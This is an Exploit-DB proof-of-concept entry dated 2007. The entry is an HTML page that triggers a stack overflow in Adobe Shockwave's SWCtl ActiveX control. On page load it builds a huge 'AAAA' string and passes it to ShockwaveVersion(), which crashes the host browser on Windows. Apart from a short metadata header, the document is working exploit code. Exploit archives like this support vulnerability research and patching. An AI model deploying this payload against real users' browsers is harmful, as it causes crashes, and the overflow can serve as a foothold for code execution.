Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)

EDB-ID:

4613


Author:

Elazar

Type:

dos


Platform:

Windows

Date:

2007-11-08


<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";
     while (s.length < 768 * 768) s=s+s;
  
     var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}     

     obj.ShockwaveVersion(s);
    }
  </script>

 </head>  
 <body onload="JavaScript: return Check();" />
</html>

# milw0rm.com [2007-11-08]